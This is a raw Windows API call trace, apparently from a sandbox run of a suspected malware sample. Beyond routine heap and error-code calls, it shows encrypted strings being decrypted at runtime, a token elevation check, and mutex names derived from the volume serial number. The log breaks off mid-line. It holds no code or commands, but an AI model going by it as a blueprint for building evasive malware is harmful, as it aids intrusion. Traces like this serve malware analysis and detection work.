[0038.906] GetLastError () returned 0x0 [0038.906] SetLastError (dwErrCode=0x0) [0038.906] GetLastError () returned 0x0 [0038.906] SetLastError (dwErrCode=0x0) [0038.906] GetLastError () returned 0x0 [0038.906] SetLastError (dwErrCode=0x0) [0038.906] GetLastError () returned 0x0 [0038.906] SetLastError (dwErrCode=0x0) [0038.906] GetLastError () returned 0x0 [0038.906] SetLastError (dwErrCode=0x0) [0038.906] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.907] SetLastError (dwErrCode=0x0) [0038.907] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.908] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.908] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.908] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.908] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.908] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.908] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.908] GetLastError () returned 0x0 [0038.908] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.909] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.909] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.909] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.909] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.909] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.909] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.909] SetLastError (dwErrCode=0x0) [0038.909] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.910] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.910] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.910] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.910] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.910] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.910] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.910] GetLastError () returned 0x0 [0038.910] SetLastError (dwErrCode=0x0) [0038.911] GetLastError () returned 0x0 [0038.911] SetLastError (dwErrCode=0x0) [0038.911] GetLastError () returned 0x0 [0038.911] SetLastError (dwErrCode=0x0) [0038.911] GetLastError () returned 0x0 [0038.911] SetLastError (dwErrCode=0x0) [0038.911] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x37) returned 0x871990 [0038.911] GetLastError () returned 0x0 [0038.911] SetLastError (dwErrCode=0x0) [0038.911] GetLastError () returned 0x0 [0038.911] SetLastError (dwErrCode=0x0) [0038.911] GetLastError () returned 0x0 [0038.911] SetLastError (dwErrCode=0x0) [0038.911] GetLastError () returned 0x0 [0038.911] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.912] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.912] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.912] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.912] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.912] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.912] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.912] SetLastError (dwErrCode=0x0) [0038.912] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.913] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.913] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.913] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.913] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.913] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.913] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.913] GetLastError () returned 0x0 [0038.913] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.914] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.914] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.914] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.914] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.914] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.914] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.914] SetLastError (dwErrCode=0x0) [0038.914] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.915] SetLastError (dwErrCode=0x0) [0038.915] GetLastError () returned 0x0 [0038.916] SetLastError (dwErrCode=0x0) [0038.916] GetLastError () returned 0x0 [0038.916] SetLastError (dwErrCode=0x0) [0038.916] GetLastError () returned 0x0 [0038.916] SetLastError (dwErrCode=0x0) [0038.916] GetLastError () returned 0x0 [0038.916] SetLastError (dwErrCode=0x0) [0038.916] GetLastError () returned 0x0 [0038.916] SetLastError (dwErrCode=0x0) [0038.916] GetLastError () returned 0x0 [0038.916] SetLastError (dwErrCode=0x0) [0038.917] GetLastError () returned 0x0 [0038.917] SetLastError (dwErrCode=0x0) [0038.917] GetLastError () returned 0x0 [0038.917] SetLastError (dwErrCode=0x0) [0038.917] GetLastError () returned 0x0 [0038.917] SetLastError (dwErrCode=0x0) [0038.917] GetLastError () returned 0x0 [0038.917] SetLastError (dwErrCode=0x0) [0038.917] GetLastError () returned 0x0 [0038.917] SetLastError (dwErrCode=0x0) [0038.917] GetLastError () returned 0x0 [0038.917] SetLastError (dwErrCode=0x0) [0038.917] GetLastError () returned 0x0 [0038.917] SetLastError (dwErrCode=0x0) [0038.917] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x98) returned 0x8719d0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1f) returned 0x871a70 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x36) returned 0x871a98 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x37) returned 0x871ad8 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x3c) returned 0x871b18 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x31) returned 0x871b60 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x17) returned 0x871ba0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x24) returned 0x871bc0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x14) returned 0x871bf0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0xd) returned 0x871c10 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x25) returned 0x871c28 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x39) returned 0x871c58 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x18) returned 0x871ca0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x17) returned 0x871cc0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0xe) returned 0x871ce0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x69) returned 0x871cf8 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x3e) returned 0x871d70 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1b) returned 0x871db8 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1d) returned 0x871de0 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x48) returned 0x871e08 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x12) returned 0x871e58 [0038.918] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x18) returned 0x871e78 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1b) returned 0x871e98 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x24) returned 0x871ec0 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x29) returned 0x871ef0 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871f28 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x41) returned 0x871f50 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x17) returned 0x871fa0 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0xf) returned 0x871fc0 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x16) returned 0x871fd8 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x2a) returned 0x871ff8 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x29) returned 0x872030 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x15) returned 0x872068 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x872088 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x2a) returned 0x8720b0 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x12) returned 0x8720e8 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x18) returned 0x872108 [0038.919] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x46) returned 0x872128 [0038.920] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8711f8 | out: hHeap=0x870000) returned 1 [0038.922] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0038.923] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x80) returned 0x8711f8 [0038.923] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1248136) returned 0x0 [0038.928] RtlSizeHeap (HeapHandle=0x870000, Flags=0x0, MemoryPointer=0x8711f8) returned 0x80 [0038.932] GetLastError () returned 0x0 [0038.932] SetLastError (dwErrCode=0x0) [0038.933] GetLastError () returned 0x0 [0038.933] SetLastError (dwErrCode=0x0) [0038.933] GetLastError () returned 0x0 [0038.933] SetLastError (dwErrCode=0x0) [0038.933] GetLastError () returned 0x0 [0038.937] SetLastError (dwErrCode=0x0) [0038.937] GetLastError () returned 0x0 [0038.937] SetLastError (dwErrCode=0x0) [0038.937] GetLastError () returned 0x0 [0038.937] SetLastError (dwErrCode=0x0) [0038.937] GetLastError () returned 0x0 [0038.937] SetLastError (dwErrCode=0x0) [0038.937] GetLastError () returned 0x0 [0038.937] SetLastError (dwErrCode=0x0) [0038.937] GetLastError () returned 0x0 [0038.937] SetLastError (dwErrCode=0x0) [0038.937] GetLastError () returned 0x0 [0038.937] SetLastError (dwErrCode=0x0) [0038.937] GetLastError () returned 0x0 [0038.938] SetLastError (dwErrCode=0x0) [0038.938] GetLastError () returned 0x0 [0038.938] SetLastError (dwErrCode=0x0) [0038.938] GetLastError () returned 0x0 [0038.938] SetLastError (dwErrCode=0x0) [0038.938] GetLastError () returned 0x0 [0038.938] SetLastError (dwErrCode=0x0) [0038.938] GetLastError () returned 0x0 [0038.938] SetLastError (dwErrCode=0x0) [0038.938] GetLastError () returned 0x0 [0038.938] SetLastError (dwErrCode=0x0) [0038.938] GetLastError () returned 0x0 [0038.938] SetLastError (dwErrCode=0x0) [0038.938] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.939] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.939] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.939] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.939] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.939] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.939] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.939] GetLastError () returned 0x0 [0038.939] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.940] SetLastError (dwErrCode=0x0) [0038.940] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.941] SetLastError (dwErrCode=0x0) [0038.941] GetLastError () returned 0x0 [0038.942] SetLastError (dwErrCode=0x0) [0038.942] GetLastError () returned 0x0 [0038.942] SetLastError (dwErrCode=0x0) [0038.942] GetLastError () returned 0x0 [0038.942] SetLastError (dwErrCode=0x0) [0038.942] GetLastError () returned 0x0 [0038.942] SetLastError (dwErrCode=0x0) [0038.942] GetLastError () returned 0x0 [0038.942] SetLastError (dwErrCode=0x0) [0038.942] GetLastError () returned 0x0 [0038.942] SetLastError (dwErrCode=0x0) [0038.943] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x30) returned 0x871280 [0038.943] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x3300) returned 0x872178 [0038.943] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x15c) returned 0x8712b8 [0038.943] GetTickCount () returned 0x1a1d9 [0038.943] GetLastError () returned 0x0 [0038.944] SetLastError (dwErrCode=0x0) [0038.944] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x41fc48, cchData=32 | out: lpLCData="\x03") returned 16 [0038.945] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1c) returned 0x871420 [0038.945] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1c) returned 0x871448 [0038.945] GetVersion () returned 0x1db10106 [0038.945] GetCurrentProcess () returned 0xffffffff [0038.945] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x41fbac | out: TokenHandle=0x41fbac*=0x80) returned 1 [0038.945] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x41fba4, TokenInformationLength=0x4, ReturnLength=0x41fba8 | out: TokenInformation=0x41fba4, ReturnLength=0x41fba8) returned 1 [0038.945] CloseHandle (hObject=0x80) returned 1 [0038.946] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x871470 [0038.946] CryptAcquireContextW (in: phProv=0x124fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x124fcf0*=0x224fe0) returned 1 [0038.973] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb08 | out: phKey=0x41fb08*=0x224dc8) returned 1 [0038.973] CryptSetKeyParam (hKey=0x224dc8, dwParam=0x1, pbData=0x41faf0, dwFlags=0x0) returned 1 [0038.973] CryptDecrypt (in: hKey=0x224dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871470, pdwDataLen=0x41fabc | out: pbData=0x871470, pdwDataLen=0x41fabc) returned 1 [0038.974] CryptDestroyKey (hKey=0x224dc8) returned 1 [0038.974] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871498 [0038.974] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x8714c0 [0038.974] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8714e8 [0038.974] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fae0 | out: phKey=0x41fae0*=0x224dc8) returned 1 [0038.974] CryptSetKeyParam (hKey=0x224dc8, dwParam=0x1, pbData=0x41fac8, dwFlags=0x0) returned 1 [0038.974] CryptDecrypt (in: hKey=0x224dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714e8, pdwDataLen=0x41fa94 | out: pbData=0x8714e8, pdwDataLen=0x41fa94) returned 1 [0038.974] CryptDestroyKey (hKey=0x224dc8) returned 1 [0038.975] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x870000) returned 1 [0038.975] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.975] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714c0 | out: hHeap=0x870000) returned 1 [0038.975] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x870000) returned 1 [0038.975] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x41fb48, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x41fb48*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.975] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x870000) returned 1 [0038.975] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x871470 [0038.975] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fad4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb3c | out: phKey=0x41fb3c*=0x224dc8) returned 1 [0038.976] CryptSetKeyParam (hKey=0x224dc8, dwParam=0x1, pbData=0x41fb24, dwFlags=0x0) returned 1 [0038.976] CryptDecrypt (in: hKey=0x224dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871470, pdwDataLen=0x41faf0 | out: pbData=0x871470, pdwDataLen=0x41faf0) returned 1 [0038.976] CryptDestroyKey (hKey=0x224dc8) returned 1 [0038.976] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x8714b8 [0038.976] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x84 [0038.976] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x102 [0038.976] CloseHandle (hObject=0x84) returned 1 [0038.976] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x870000) returned 1 [0038.976] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714b8 | out: hHeap=0x870000) returned 1 [0038.976] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x871470 [0038.976] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fab4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb1c | out: phKey=0x41fb1c*=0x224dc8) returned 1 [0038.977] CryptSetKeyParam (hKey=0x224dc8, dwParam=0x1, pbData=0x41fb04, dwFlags=0x0) returned 1 [0038.977] CryptDecrypt (in: hKey=0x224dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871470, pdwDataLen=0x41fad0 | out: pbData=0x871470, pdwDataLen=0x41fad0) returned 1 [0038.977] CryptDestroyKey (hKey=0x224dc8) returned 1 [0038.977] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871498 [0038.977] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x8714c0 [0038.977] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8714e8 [0038.977] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fa8c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41faf4 | out: phKey=0x41faf4*=0x224dc8) returned 1 [0038.977] CryptSetKeyParam (hKey=0x224dc8, dwParam=0x1, pbData=0x41fadc, dwFlags=0x0) returned 1 [0038.977] CryptDecrypt (in: hKey=0x224dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714e8, pdwDataLen=0x41faa8 | out: pbData=0x8714e8, pdwDataLen=0x41faa8) returned 1 [0038.977] CryptDestroyKey (hKey=0x224dc8) returned 1 [0038.977] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x870000) returned 1 [0038.977] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.977] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714c0 | out: hHeap=0x870000) returned 1 [0038.977] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x870000) returned 1 [0038.977] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x41fb5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x41fb5c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.978] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x870000) returned 1 [0038.978] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x871470 [0038.978] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fae8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb50 | out: phKey=0x41fb50*=0x224dc8) returned 1 [0038.978] CryptSetKeyParam (hKey=0x224dc8, dwParam=0x1, pbData=0x41fb38, dwFlags=0x0) returned 1 [0038.978] CryptDecrypt (in: hKey=0x224dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871470, pdwDataLen=0x41fb04 | out: pbData=0x871470, pdwDataLen=0x41fb04) returned 1 [0038.978] CryptDestroyKey (hKey=0x224dc8) returned 1 [0038.978] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x8714b8 [0038.978] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x0 [0038.978] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4200") returned 0x84 [0039.065] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0039.065] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x870000) returned 1 [0039.066] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714b8 | out: hHeap=0x870000) returned 1 [0039.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241f5f, lpParameter=0x41fbec, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c [0039.067] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x60) returned 0x871470 [0039.067] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faf8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb60 | out: phKey=0x41fb60*=0x224ba8) returned 1 [0039.067] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fb48, dwFlags=0x0) returned 1 [0039.067] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871470, pdwDataLen=0x41fb14 | out: pbData=0x871470, pdwDataLen=0x41fb14) returned 1 [0039.067] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.067] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8714d8 [0039.067] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fad0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb38 | out: phKey=0x41fb38*=0x224ba8) returned 1 [0039.067] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fb20, dwFlags=0x0) returned 1 [0039.067] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714d8, pdwDataLen=0x41faec | out: pbData=0x8714d8, pdwDataLen=0x41faec) returned 1 [0039.067] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.067] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871500 [0039.067] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871528 [0039.067] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x871550 [0039.068] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb10 | out: phKey=0x41fb10*=0x224ba8) returned 1 [0039.068] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41faf8, dwFlags=0x0) returned 1 [0039.068] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871550, pdwDataLen=0x41fac4 | out: pbData=0x871550, pdwDataLen=0x41fac4) returned 1 [0039.068] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.068] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871550 | out: hHeap=0x870000) returned 1 [0039.068] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x871500, nSize=0xf | out: lpDst="") returned 0x2c [0039.068] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871528 | out: hHeap=0x870000) returned 1 [0039.068] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x871500, Size=0x3a) returned 0x871500 [0039.068] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x3a) returned 0x871548 [0039.068] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x871590 [0039.068] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb0c | out: phKey=0x41fb0c*=0x224ba8) returned 1 [0039.068] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41faf4, dwFlags=0x0) returned 1 [0039.068] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871590, pdwDataLen=0x41fac0 | out: pbData=0x871590, pdwDataLen=0x41fac0) returned 1 [0039.068] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.068] HeapFree (in: hHeap=0x870000, dwFlags=0x0, 